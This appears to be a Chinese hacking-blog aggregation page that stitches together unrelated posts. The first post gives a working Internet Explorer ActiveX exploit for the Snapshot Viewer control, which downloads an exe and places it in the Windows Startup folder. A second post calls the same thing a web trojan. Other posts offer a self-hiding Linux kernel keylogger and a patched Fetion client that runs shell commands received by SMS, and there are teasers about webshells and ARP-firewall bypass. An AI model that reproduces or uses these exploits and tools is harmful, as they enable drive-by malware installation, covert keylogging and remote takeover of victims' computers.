今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞
EXP:
<html><object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object><script language='javascript'>var buf1 = ‘http://127.0.0.1/a.exe';var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe’;obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();</script></html>Fuzzing 时一般是对单个Property和单个Method()做FUZZ,这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的,再测试其他Property。由于此ActiveX的Property和Method都非常少,很快可以 FUZZ完
作者:WZT
来源:WZT的自由世界
这个程序源自thc的vlogger, 我将它port到了2.6.9下, 有需要的同学可以拿去耍耍。
make;make install即可安装, 模块自动隐藏, 生成的记录文件在/tmp/kloger下, 也是隐藏掉的。
稳定性需要进一步测试, 此程序仅用于学习和交流使用。
下载地址:http://blogimg.chinaunix.net/blog/upfile2/080708211858.gz
作者:lcx
来源:vbs小铺
测试此网马不必要装access,只需单独装一个SNAPVIEW.EXE就可以测试(微软有下),不过我没有找到这个控件的可执行的方法,只能将网马的exe用js判断系统的语言选项后放在启动项里。装ACESS的用户要小心了。下边是我eXeScope 找到此此ActiveX的Property和Method。
SnapshotViewerControl; // Snapshot Viewer ControlEnum SnapZoom;snapZoomToFit = 0;snapZoomToFill = 1;snapZoom200Percent = 2;snapZoom150Percent = 3;snapZoom100Percent = 4;snapZoom75Percent = 5;snapZoom50Percent = 6;snapZoom25Percent = 7;snapZoom10Percent = 8;Dispatch ISnapshotViewer; // Snapshot Viewer ControlGUID={EE7C5CD0-368C-11D0-AD81-00A0C90DC8D9};function QueryInterface(riid:^GUID; out ppvObj:^^void);function AddRef: UI4;function Release: UI4;function GetTypeInfoCount(out pctinfo:^UINT);function GetTypeInfo(itinfo:UINT; lcid:UI4; out pptinfo:^^void);function GetIDsOfNames(riid:^GUID; rgszNames:^^I1; cNames:UINT; lcid:UI4; out rgdispid:^I4);function Invoke(dispidMember:I4; riid:^GUID; lcid:UI4; wFlags:UI2; pdispparams:^DISPPARAMS; out pvarResult:^variant; out pexcepinfo:^EXCEPINFO; out puArgErr:^UINT);property-get SnapshotPath: BSTR;property-put SnapshotPath(BSTR);property-get CompressedPath: BSTR;property-put CompressedPath(BSTR);property-get Zoom: SnapZoom;property-put Zoom(SnapZoom);property-get AllowContextMenu: bool;property-put AllowContextMenu(bool);property-get ShowNavigationButtons: bool;property-put ShowNavigationButtons(bool);property-get PageCount: I4;property-put PageCount(I4);property-get CurrentPage: I4;property-put CurrentPage(I4);property-get ReadyState: I4;property-put ReadyState(I4);property-get Error: I4;property-put Error(I4);function AboutBox;function PrintSnapshot(fShowDialog:bool);function FirstPage;function PreviousPage;function NextPage;function LastPage;function GetDesiredExtents(out pdxDesired:^I4; out pdyDesired:^I4);function NotifyDataChanged;function PrintSnapshotDirect(bstrDriverName:BSTR; bstrPrinterName:BSTR; bstrPortName:BSTR);Dispatch DSnapshotViewerEvents; // Event interface for the Snapshot Viewer ControlGUID={EFAF8180-368C-11D0-AD81-00A0C90DC8D9};function FirstPage;function PrevPage;function NextPage;function LastPage;function Progress(Amount:I4);function ReadyStateChange(ReadyState:I4);Class SnapshotViewer; // Snapshot Viewer ControlGUID={F0E42D50-368C-11D0-AD81-00A0C90DC8D9};function QueryInterface(riid:^GUID; out ppvObj:^^void);function AddRef: UI4;function Release: UI4;function GetTypeInfoCount(out pctinfo:^UINT);function GetTypeInfo(itinfo:UINT; lcid:UI4; out pptinfo:^^void);function GetIDsOfNames(riid:^GUID; rgszNames:^^I1; cNames:UINT; lcid:UI4; out rgdispid:^I4);function Invoke(dispidMember:I4; riid:^GUID; lcid:UI4; wFlags:UI2; pdispparams:^DISPPARAMS; out pvarResult:^variant; out pexcepinfo:^EXCEPINFO; out puArgErr:^UINT);property-get SnapshotPath: BSTR;property-put SnapshotPath(BSTR);property-get CompressedPath: BSTR;property-put CompressedPath(BSTR);property-get Zoom: SnapZoom;property-put Zoom(SnapZoom);property-get AllowContextMenu: bool;property-put AllowContextMenu(bool);property-get ShowNavigationButtons: bool;property-put ShowNavigationButtons(bool);property-get PageCount: I4;property-put PageCount(I4);property-get CurrentPage: I4;property-put CurrentPage(I4);property-get ReadyState: I4;property-put ReadyState(I4);property-get Error: I4;property-put Error(I4);function AboutBox;function PrintSnapshot(fShowDialog:bool);function FirstPage;function PreviousPage;function NextPage;function LastPage;function GetDesiredExtents(out pdxDesired:^I4; out pdyDesired:^I4);function NotifyDataChanged;function PrintSnapshotDirect(bstrDriverName:BSTR; bstrPrinterName:BSTR; bstrPortName:BSTR);function FirstPage;function PrevPage;function NextPage;function LastPage;function Progress(Amount:I4);function ReadyStateChange(ReadyState:I4);Class SnapshotViewerDeprecated; // Snapshot Viewer ControlGUID={F0E42D60-368C-11D0-AD81-00A0C90DC8D9};function QueryInterface(riid:^GUID; out ppvObj:^^void);function AddRef: UI4;function Release: UI4;function GetTypeInfoCount(out pctinfo:^UINT);function GetTypeInfo(itinfo:UINT; lcid:UI4; out pptinfo:^^void);function GetIDsOfNames(riid:^GUID; rgszNames:^^I1; cNames:UINT; lcid:UI4; out rgdispid:^I4);function Invoke(dispidMember:I4; riid:^GUID; lcid:UI4; wFlags:UI2; pdispparams:^DISPPARAMS; out pvarResult:^variant; out pexcepinfo:^EXCEPINFO; out puArgErr:^UINT);property-get SnapshotPath: BSTR;property-put SnapshotPath(BSTR);property-get CompressedPath: BSTR;property-put CompressedPath(BSTR);property-get Zoom: SnapZoom;property-put Zoom(SnapZoom);property-get AllowContextMenu: bool;property-put AllowContextMenu(bool);property-get ShowNavigationButtons: bool;property-put ShowNavigationButtons(bool);property-get PageCount: I4;property-put PageCount(I4);property-get CurrentPage: I4;property-put CurrentPage(I4);property-get ReadyState: I4;property-put ReadyState(I4);property-get Error: I4;property-put Error(I4);function AboutBox;function PrintSnapshot(fShowDialog:bool);function FirstPage;function PreviousPage;function NextPage;function LastPage;function GetDesiredExtents(out pdxDesired:^I4; out pdyDesired:^I4);function NotifyDataChanged;function PrintSnapshotDirect(bstrDriverName:BSTR; bstrPrinterName:BSTR; bstrPortName:BSTR);function FirstPage;function PrevPage;function NextPage;function LastPage;function Progress(Amount:I4);function ReadyStateChange(ReadyState:I4);
来源:Solo’s Tech Space
上次用Reflector反编译了一份FetionFx.exe.然后没事写了下面的小玩意。申明下,这玩意没有任何侵权的想法,抄袭别人代码也是我的一大长处,如果你在代码里发现有某些行代码看着很熟悉,SORRY,抄来玩玩,不要介意,当然也欢迎你抄我的(是一种对我的肯定)。本玩意只是学习练习代码所用,功能上也没有任何实用性,法律上不承担任何责任。仅个人自娱用。我叫它FXRobot
FXRobot功能:
用飞信或手机客户端发送信息让PC客户端执行你所添加的插件支持的命令,可以定时执行插件里的命令。实现远程,定时执行PC里的程序。如果点击关闭机器人,那么它就是一个普通的飞信。
目前可以执行的命令有:
一.如 “[cmd]ipconfig,[cmd]shutdown -s”等这类的开始->运行里的命令行
二:如”[fy]test,[fy]测试” 英汉互译。
三:支持一机开多个Fetion。
先看几个截图:
图一,菜单被QJ添加了一个”FXRobot管理”
图二:界面
图三,可以添加执行机器人程序的用户,只有选中的用户才会执行那些插件里的命令。
其他截图见相册:
http://www.cnblogs.com/solo/gallery/143922.html
最后,最要紧的东西。
试用:
下载:fxrobot_compile_dll.rar
一、备份X:\Program Files\China Mobile\Fetion 下面的FetionFx.exe.
把fxrobot_compile_dll.rar里的文件Copy进去.OK了。
FXRobot源代码:fxrobot_source_code.rar
未解决的问题:请帮忙
http://space.cnblogs.com/question/1831/
参考的文章:
上午的绝缘杯:
通过免费手机短信来控制电脑—”执行者”介绍
坚守理想:
[转]sqlite常见问题
元宝家园:
通过反编译飞信总结的代码除错技巧
这是一篇隐藏日志。您需要以合适的身份登入后才能查看。
来源:gxgl.com注意:旧版数据库需要升级,把update.exe放在同目录下运行升级即可。Shell备注处怎么填?=>asp脚本ADO数据库:Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=pass | 其它信息;=>php脚本MYSQL数据库:localhost | root | pass | 其它信息;INFOMIX和ORACLE数据库:...
作者: cnqing来源: cncert.net软件说明:可突破任意ARP防火墙,以限制流量为目标的简单网络管理软件。使用方法:1.在参数设置中选择好工作网卡;2.检查网关信息和本机信息是否正确,如果不正确,请手动输入,无需保存;3.点击流量探测或手动添加或自动扫描以填充目标列表;4.设置一个代理,最好不...
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)文章作者:fhod发这个也是因为看了asm所写的原创]新概念收信程序 箱子永远不会被黑http://forum.eviloctal.com/thread-32151-1-1.html之后又有会员PM我..加上事过已久..也不是什么保密的东西了..网上也许到处都是了..就考虑把东西发出来..算是...
作者:vbs_zone来源:vbs空间把myipneighbors查询的结果COPY下来,然后保存后,拖到此脚本上,进行整理因为myipneighbors有验证码,能力有限,没办法突破..只能先这样了.碰到虚拟机的时候,还是能偷点懒的 On Error Resume NextSet Arg=Wscript.ArgumentsIf Arg.count=0 then Wscript.quit'code by Net...
整理的 c,linux,perl,php,python 电子书 免费下载
